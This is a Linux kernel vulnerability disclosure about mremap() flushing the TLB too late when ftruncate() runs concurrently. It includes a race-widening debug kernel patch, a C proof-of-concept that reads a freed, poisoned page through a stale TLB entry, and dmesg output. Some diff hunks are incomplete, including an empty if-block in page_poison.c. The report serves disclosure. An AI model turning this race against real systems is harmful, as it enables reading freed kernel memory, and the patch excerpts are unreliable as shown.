Linux mremap() TLB Flush Too Late

Linux has an issue where mremap() performs a TLB flush too late with concurrent ftruncate().

MD5 | 662f158d83c31c10c9b25a7d01c09b0a

Linux: mremap() TLB flush too late with concurrent ftruncate() 


Tested on the master branch (4.19.0-rc7+).

sys_mremap() takes current->mm->mmap_sem for writing, then calls
mremap_to()->move_vma()->move_page_tables(). move_page_tables() first
calls move_ptes() (which takes PTE locks, moves PTEs, and drops PTE
locks) in a loop, then performs a TLB flush with flush_tlb_range().
move_ptes() can also perform TLB flushes, but only when dirty PTEs are
encountered - non-dirty, accessed PTEs don't trigger such early flushes.
Between the move_ptes() loop and the TLB flush, the only lock being
held in move_page_tables() is current->mm->mmap_sem.

Truncation paths that end in zap_page_range_single() can concurrently access the page tables of a
process that is in move_page_tables(), between the move_ptes() loop
and the TLB flush.

The following race can occur in a process with three threads A, B and C:

A: maps a file of size 0x1000 at address X, with PROT_READ and MAP_SHARED
C: starts reading from address X in a busyloop
A: starts an mremap() call that remaps from X to Y; syscall progresses
until directly before the flush_tlb_range() call in move_page_tables()
[at this point, the PTE for X is gone, but C still has a read-only TLB
entry for X; the PTE for Y has been created]
B: uses sys_ftruncate() to change the file size to zero. this removes
the PTE for address Y, then sends a TLB flush IPI *for address Y*.
The TLB entry *for address X* stays alive.

The kernel now assumes that the page is not referenced by any
userspace task anymore, but actually, thread C can still use the stale
TLB entry at address X to read from it.

At this point, the page can be freed as soon as it disappears from the
LRU list (which I don't really understand); it looks like there are
various kernel interfaces that can be used to trigger
lru_add_drain_all(). For simplicity, I am using root privileges to
write to /proc/sys/vm/compact_memory in order to trigger this.

To test this, I configured my kernel with PAGE_TABLE_ISOLATION=n,
commandline flag "page_poison=1". I patched the kernel as follows to
widen the race window (and make debugging easier). A copy of the patch
is attached.

diff --git a/arch/x86/mm/tlb.c b/arch/x86/mm/tlb.c
index e96b99eb800c..8156628a6204 100644
--- a/arch/x86/mm/tlb.c
+++ b/arch/x86/mm/tlb.c
@@ -567,6 +567,11 @@ static void flush_tlb_func_remote(void *info)
if (f->mm && f->mm != this_cpu_read(cpu_tlbstate.loaded_mm))
return;

+ if (strcmp(current->comm, "race2") == 0) {
+ pr_warn("remotely-triggered TLB shootdown: start=0x%lx end=0x%lx\n",
+ f->start, f->end);
+ }
flush_tlb_func_common(f, false, TLB_REMOTE_SHOOTDOWN);
diff --git a/mm/compaction.c b/mm/compaction.c
index faca45ebe62d..27594b4868ec 100644
--- a/mm/compaction.c
+++ b/mm/compaction.c
@@ -1852,11 +1852,15 @@ static void compact_nodes(void)
int nid;

+ pr_warn("compact_nodes entry\n");
/* Flush pending updates to the LRU lists */
lru_add_drain_all();

+ pr_warn("compact_nodes exit\n");

/* The written value is actually unused, all memory is compacted */
diff --git a/mm/mremap.c b/mm/mremap.c
index 5c2e18505f75..be34e0a7258e 100644
--- a/mm/mremap.c
+++ b/mm/mremap.c
@@ -186,6 +186,7 @@ static void move_ptes(struct vm_area_struct *vma, pmd_t *old_pmd,
flush_tlb_range(vma, old_end - len, old_end);
*need_flush = true;
pte_unmap_unlock(old_pte - 1, old_ptl);
if (need_rmap_locks)
@@ -248,8 +249,18 @@ unsigned long move_page_tables(struct vm_area_struct *vma,
move_ptes(vma, old_pmd, old_addr, old_addr + extent, new_vma,
new_pmd, new_addr, need_rmap_locks, &need_flush);
- if (need_flush)
+ if (need_flush) {
+ if (strcmp(current->comm, "race") == 0) {
+ int i;
+ pr_warn("spinning before flush\n");
+ for (i=0; i<100000000; i++) barrier();
+ pr_warn("spinning before flush done\n");
+ }
flush_tlb_range(vma, old_end-len, old_addr);
+ if (strcmp(current->comm, "race") == 0) {
+ pr_warn("flush done\n");
+ }
+ }

mmu_notifier_invalidate_range_end(vma->vm_mm, mmun_start, mmun_end);

diff --git a/mm/page_poison.c b/mm/page_poison.c
index aa2b3d34e8ea..5ffe8b998573 100644
--- a/mm/page_poison.c
+++ b/mm/page_poison.c
@@ -34,6 +34,10 @@ static void poison_page(struct page *page)
void *addr = kmap_atomic(page);

+ if (*(unsigned long *)addr == 0x4141414141414141UL) {
+ }
memset(addr, PAGE_POISON, PAGE_SIZE);
diff --git a/mm/shmem.c b/mm/shmem.c
index 446942677cd4..838b5f77cc0e 100644
--- a/mm/shmem.c
+++ b/mm/shmem.c
@@ -1043,6 +1043,11 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)
if (newsize <= oldsize) {
loff_t holebegin = round_up(newsize, PAGE_SIZE);
+ if (strcmp(current->comm, "race") == 0) {
+ pr_warn("shmem_setattr entry\n");
+ }
if (oldsize > holebegin)
unmap_mapping_range(inode->i_mapping,
holebegin, 0, 1);
@@ -1054,6 +1059,10 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)
holebegin, 0, 1);

+ if (strcmp(current->comm, "race") == 0) {
+ pr_warn("shmem_setattr exit\n");
+ }
* Part of the huge page can be beyond i_size: subject
* to shrink under memory pressure.

Then, I ran the following testcase a few times (compile with
"gcc -O2 -o race race.c -pthread"; note that the filename matters for
the kernel patch):

#define _GNU_SOURCE
#include <pthread.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/prctl.h>

#define ul unsigned long

static int alloc_fd = -1;
#define allocptr ((ul *)0x100000000000)
#define allocptr2 ((ul *)0x100000002000)

/*
 * Reader thread.
 *
 * Names itself "race2" (matched by the flush_tlb_func_remote() debug
 * patch above) and busy-loops reading through the mapping at allocptr
 * (address X). While the mapping is intact it only ever sees the 0x41
 * fill pattern written by main(); if the stale-TLB race hits, the read
 * goes through a dangling TLB entry and returns freed/poisoned page
 * contents, which is then printed. The loop runs until the thread
 * eventually faults once the stale entry is gone.
 *
 * NOTE(review): the closing braces of the if/while/function were lost
 * in extraction; restored here without changing the visible logic.
 */
void *reader_fn(void *dummy) {
	prctl(PR_SET_NAME, "race2");
	while (1) {
		ul x = *(volatile ul *)allocptr;
		if (x != 0x4141414141414141UL) {
			printf("GOT 0x%016lx\n", x);
		}
	}
}
/*
 * Truncator thread.
 *
 * Shrinks the backing file to zero bytes — this removes the PTE at the
 * *new* address Y and sends a TLB shootdown for Y only — then writes to
 * /proc/sys/vm/compact_memory to trigger lru_add_drain_all() so the now
 * "unreferenced" page actually gets freed. Requires root for the sysctl
 * write (see the report text).
 *
 * NOTE(review): the closing brace of the function was lost in
 * extraction; restored here without changing the visible logic.
 */
void *truncate_fn(void *dummy) {
	if (ftruncate(alloc_fd, 0)) err(1, "ftruncate");
	int sysctl_fd = open("/proc/sys/vm/compact_memory", O_WRONLY);
	if (sysctl_fd == -1) err(1, "unable to open sysctl");
	write(sysctl_fd, "1", 1);
	return 0;
}
/*
 * Sets up the race: creates a one-page shared file filled with 0x41,
 * maps it read-only at allocptr (X), starts the reader and truncator
 * threads, then mremap()s X to allocptr2 (Y). The kernel-side delay
 * patch widens the window between the PTE move and flush_tlb_range(),
 * during which ftruncate() in the other thread flushes only Y while the
 * reader keeps using a stale TLB entry for X.
 *
 * NOTE(review): the closing brace of main() was lost in extraction;
 * restored here without changing the visible logic. (The err/errx
 * mixture on the two pthread_create calls is as in the original.)
 */
int main(void) {
	alloc_fd = open("/dev/shm/race_demo", O_RDWR|O_CREAT|O_TRUNC, 0600);
	if (alloc_fd == -1) err(1, "open");
	char buf[0x1000];
	memset(buf, 0x41, sizeof(buf));
	if (write(alloc_fd, buf, sizeof(buf)) != sizeof(buf)) err(1, "write");
	if (mmap(allocptr, 0x1000, PROT_READ, MAP_SHARED, alloc_fd, 0) != allocptr) err(1, "mmap");

	pthread_t reader;
	if (pthread_create(&reader, NULL, reader_fn, NULL)) errx(1, "thread");

	pthread_t truncator;
	if (pthread_create(&truncator, NULL, truncate_fn, NULL)) err(1, "thread2");

	if (mremap(allocptr, 0x1000, 0x1000, MREMAP_FIXED|MREMAP_MAYMOVE, allocptr2) != allocptr2) err(1, "mremap");
	return 0;
}

After a few attempts, I get the following output:

user@debian:~/mremap_ftruncate_race$ sudo ./race
GOT 0xaaaaaaaaaaaaaaaa
Segmentation fault

Note that 0xaaaaaaaaaaaaaaaa is PAGE_POISON.

dmesg reports:
shmem_setattr entry
shmem_setattr exit
spinning before flush
shmem_setattr entry
remotely-triggered TLB shootdown: start=0x100000002000 end=0x100000003000
shmem_setattr exit
compact_nodes entry
------------[ cut here ]------------
WARNING: CPU: 5 PID: 1334 at mm/page_poison.c:38 kernel_poison_pages+0x10a/0x180
Modules linked in: btrfs xor zstd_compress raid6_pq
CPU: 5 PID: 1334 Comm: kworker/5:1 Tainted: G W 4.19.0-rc7+ #188
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
Workqueue: mm_percpu_wq lru_add_drain_per_cpu
RIP: 0010:kernel_poison_pages+0x10a/0x180
Call Trace:
? __mod_zone_page_state+0x66/0xa0
? pagevec_move_tail_fn+0x2b0/0x2b0
? process_one_work+0x400/0x400
? kthread_create_worker_on_cpu+0x70/0x70
---[ end trace aed8d7b167ea0097 ]---
compact_nodes exit
spinning before flush done
flush done
race2[1430]: segfault at 100000000000 ip 000055f56e711b98 sp 00007f02d7823f40 error 4 in race[55f56e711000+1000]

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Found by: jannh

Related Posts